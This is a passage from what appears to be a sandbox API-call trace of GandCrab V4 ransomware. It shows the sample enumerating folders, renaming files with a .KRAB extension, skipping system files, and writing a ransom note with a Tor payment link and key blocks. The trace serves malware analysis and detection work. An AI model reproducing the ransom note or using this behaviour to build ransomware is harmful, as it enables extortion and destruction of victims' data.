/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.544] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.545] CloseHandle (hObject=0x440) returned 1 [0057.545] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.545] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.545] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x2ed)) [0057.545] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.546] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.546] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.546] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a08d2ca4dee3d.lock") returned 100 [0057.546] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0057.560] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.560] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.560] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 77 [0057.560] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0057.560] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd860 [0057.560] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.560] FindNextFileW (in: hFindFile=0xfbd860, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.560] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.560] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.560] FindNextFileW (in: hFindFile=0xfbd860, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.561] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.561] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.561] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a08d2ca4dee3d.lock" [0057.561] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.561] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 105 [0057.561] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a08d2ca4dee3d.lock") returned 100 [0057.561] lstrlenW (lpString=".lock") returned 5 [0057.561] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.561] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.561] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.562] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.562] FindNextFileW (in: hFindFile=0xfbd860, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.562] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.562] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.562] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\KRAB-DECRYPT.txt" [0057.562] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.562] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\KRAB-DECRYPT.txt.KRAB") returned 98 [0057.562] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\KRAB-DECRYPT.txt") returned 93 [0057.562] lstrlenW (lpString=".txt") returned 4 [0057.562] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.562] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.563] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.563] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\KRAB-DECRYPT.txt") returned 93 [0057.563] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\KRAB-DECRYPT.txt") returned 93 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.563] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.563] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.563] FindNextFileW (in: hFindFile=0xfbd860, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.563] lstrcmpW (lpString1="support", lpString2=".") returned 1 [0057.563] lstrcmpW (lpString1="support", lpString2="..") returned 1 [0057.563] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="support" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0057.563] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" [0057.563] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.564] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.564] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.564] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.564] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.564] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.564] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.564] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\KRAB-DECRYPT.txt") returned 102 [0057.564] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0057.566] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.566] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.567] CloseHandle (hObject=0x448) returned 1 [0057.568] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.568] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.568] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x2fd)) [0057.568] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.569] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.569] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.569] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a08d2ca4dee3d.lock") returned 108 [0057.569] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0057.603] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.603] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.603] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 85 [0057.603] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0057.603] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd3a0 [0057.603] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.604] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0057.604] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.604] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.604] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0057.604] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.604] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.604] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a08d2ca4dee3d.lock" [0057.604] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.604] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 113 [0057.604] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a08d2ca4dee3d.lock") returned 108 [0057.604] lstrlenW (lpString=".lock") returned 5 [0057.604] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.604] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.604] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.605] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.605] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0057.605] lstrcmpW (lpString1="flashplayer", lpString2=".") returned 1 [0057.605] lstrcmpW (lpString1="flashplayer", lpString2="..") returned 1 [0057.605] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="flashplayer" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0057.605] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" [0057.605] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.606] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.606] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 